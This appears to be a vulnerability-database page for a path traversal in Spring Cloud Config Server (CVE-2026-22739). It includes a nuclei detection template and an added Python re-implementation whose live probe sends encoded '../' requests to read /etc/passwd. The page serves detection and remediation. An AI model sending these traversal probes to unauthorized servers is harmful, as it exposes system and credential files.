
Spring Cloud Config Server - Path Traversal

CVE-2026-22739
Verified

Description

Spring Cloud Config 3.1.x < 3.1.13, 4.1.x < 4.1.9, 4.2.x < 4.2.3, 4.3.x < 4.3.2, and 5.0.x < 5.0.2 contain a path traversal in Config Server deployments that use the native file system backend. The profile segment of a configuration request is substituted into the backend's file paths, so a crafted request can make the server read files outside the configured configuration directories.

Severity

High

CVSS Score

8.6

Exploit Probability

9%

Affected Product

spring_cloud_config

Published Date

March 29, 2026

Template Author

0x_akoko, vulnh0lic

CVE-2026-22739.yaml
id: CVE-2026-22739

info:
  name: Spring Cloud Config Server - Path Traversal
  author: 0x_Akoko,vulnh0lic
  severity: high
  description: |
    Spring Cloud Config 3.1.x < 3.1.13, 4.1.x < 4.1.9, 4.2.x < 4.2.3, 4.3.x < 4.3.2, and 5.0.x < 5.0.2 contain a path traversal in Config Server deployments that use the native file system backend. The profile segment of a configuration request is substituted into the backend's file paths, so a crafted request can make the server read files outside the configured configuration directories.
  impact: |
    An unauthenticated attacker can read files outside the configured directories, exposing sensitive information such as credentials held in configuration or system files.
  remediation: |
    Upgrade to version 3.1.13, 4.1.9, 4.2.3, 4.3.2, or 5.0.2 or later.
  reference:
    - https://spring.io/security/cve-2026-22739
    - https://spring.io/blog/2026/03/23/spring-cloud-config-5-0-2-4-3-2-4-2-6-4-1-9-3-1-13-released
    - https://nvd.nist.gov/vuln/detail/CVE-2026-22739
    - https://www.herodevs.com/vulnerability-directory/cve-2026-22739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
    cvss-score: 8.6
    cve-id: CVE-2026-22739
    epss-score: 0.09315
    epss-percentile: 0.92856
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 5
    vendor: vmware
    product: spring_cloud_config
    shodan-query: http.html:"propertySources"
    fofa-query: body="propertySources" && body="profiles" && body="label"
  tags: cve,cve2026,spring,spring-cloud,config-server,lfi,traversal

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/application/default"

    matchers:
      - type: word
        part: body
        words:
          - "propertySources"
          - '"profiles"'
          - '"label"'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/application/..%2F..%2F..%2F..%2F..%2Fetc"
      - "{{BaseURL}}/application/..%2F..%2F..%2F..%2F..%2Fetc/main"
      - "{{BaseURL}}/application/..%252F..%252F..%252F..%252F..%252Fetc"
      - "{{BaseURL}}/application/default%2C..%2F..%2F..%2F..%2F..%2Fetc"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "\"root\":\"x:0:0:"
          - "root:.*:0:0"
        condition: or

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207ae7f8d466ffc1b4c6495d85915b7e8ea962d6b84cf4db20e71a8ff6a7813780022100ecec4c511307502524ea096846360e8def718422e5d4817aa082c160a033f592:922c64590222798bb761d5b6d8e72950
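As an added example that is not part of the template above or of Spring Cloud Config, the script below re-implements the template's two-stage check in Python so the matcher logic can be run offline against saved responses and, with probe_live, against a server. It assumes /opt/config as the native search root and constructs both sample responses itself; neither is captured traffic. The escaped_sources check goes beyond the template: it flags any file: property source whose normalized path falls outside the search root, so it also catches a traversal that read something other than /etc/passwd.

```python
"""Offline re-implementation of the CVE-2026-22739 nuclei template's checks.

Added example, not part of the template or of Spring Cloud Config. The two
sample responses are constructed to mirror the Config Server environment
document shape ({name, profiles, label, version, state, propertySources});
the path prefix /opt/config is an assumed search root, not a real default.
"""
import json
import posixpath
import re
from typing import Dict, List, Optional
from urllib.parse import quote

# /etc/passwd either parsed as a .properties file ("root":"x:0:0:...) or echoed
# raw (root:x:0:0), the same two patterns the template's regex matcher uses.
PASSWD_RE = re.compile(r'"root":"x:0:0:|root:.*:0:0')


def probe_paths(base_url: str, depth: int = 5) -> List[str]:
    """The four request paths from the template, for /{application}/{profile}[/{label}]."""
    trav = "..%2F" * depth + "etc"
    return [
        f"{base_url}/application/{trav}",                  # traversal in the profile segment
        f"{base_url}/application/{trav}/main",             # same, with an explicit label
        f"{base_url}/application/{quote(trav, safe='')}",  # double-encoded: %2F becomes %252F
        f"{base_url}/application/default%2C{trav}",        # traversal as a second, comma-separated profile
    ]


def is_config_server(body: str) -> bool:
    """Template request 1: the body is a Config Server environment document."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return False
    return isinstance(doc, dict) and {"propertySources", "profiles", "label"} <= doc.keys()


def matches_template(status: int, content_type: str, body: str) -> bool:
    """Template request 2: HTTP 200, JSON content type, and /etc/passwd data in the body."""
    return status == 200 and "application/json" in content_type and PASSWD_RE.search(body) is not None


def escaped_sources(body: str, search_root: str) -> List[str]:
    """Names of file: property sources whose normalized path lies outside search_root."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return []
    if not isinstance(doc, dict):
        return []
    root = posixpath.normpath(search_root).rstrip("/") + "/"
    outside = []
    for ps in doc.get("propertySources", []):
        name = ps.get("name", "") if isinstance(ps, dict) else ""
        if not name.startswith("file:"):
            continue
        path = posixpath.normpath(name[len("file:"):])  # collapses the ../ segments
        if not path.startswith(root):
            outside.append(name)
    return outside


def probe_live(base_url: str, search_root: Optional[str] = None, timeout: float = 5.0) -> Dict[str, bool]:
    """Send the template's requests with urllib and map each URL to a vulnerable/not verdict.

    Network use; run only against hosts you are authorized to test.
    """
    import urllib.request
    results: Dict[str, bool] = {}
    for url in probe_paths(base_url):
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", "replace")
                hit = matches_template(resp.status, resp.headers.get("Content-Type", ""), body)
                if search_root is not None:
                    hit = hit or bool(escaped_sources(body, search_root))
                results[url] = hit
        except (OSError, ValueError):  # HTTPError/URLError are OSError subclasses
            results[url] = False
    return results


# Constructed sample responses in compact JSON, as Jackson emits it. Not captured traffic.
CLEAN_RESPONSE = json.dumps({
    "name": "application", "profiles": ["default"], "label": None, "version": None, "state": None,
    "propertySources": [
        {"name": "file:/opt/config/application.properties", "source": {"server.port": "8080"}},
    ],
}, separators=(",", ":"))

VULNERABLE_RESPONSE = json.dumps({
    "name": "application", "profiles": ["../../../../../etc"], "label": None, "version": None, "state": None,
    "propertySources": [
        # /etc/passwd loaded as a .properties file: the first ':' on each line splits key from value
        {"name": "file:/opt/config/../../../../../etc/passwd",
         "source": {"root": "x:0:0:root:/root:/bin/bash", "daemon": "x:1:1:daemon:/usr/sbin:/usr/sbin/nologin"}},
    ],
}, separators=(",", ":"))
```

The offline functions are what the template's matchers encode: is_config_server is the internal matcher on the first request, matches_template the and-combined regex, header and status matchers on the second. probe_live only wires those to urllib; it does no path normalization on the client side, so the encoded ../ segments reach the server intact.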
CVSS Metrics

Score: 8.6
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
CVE ID: CVE-2026-22739
CWE ID: CWE-22

References

https://spring.io/security/cve-2026-22739
https://spring.io/blog/2026/03/23/spring-cloud-config-5-0-2-4-3-2-4-2-6-4-1-9-3-1-13-released
https://nvd.nist.gov/vuln/detail/CVE-2026-22739
https://www.herodevs.com/vulnerability-directory/cve-2026-22739

Remediation Steps

Upgrade to version 3.1.13, 4.1.9, 4.2.3, 4.3.2, or 5.0.2 or later.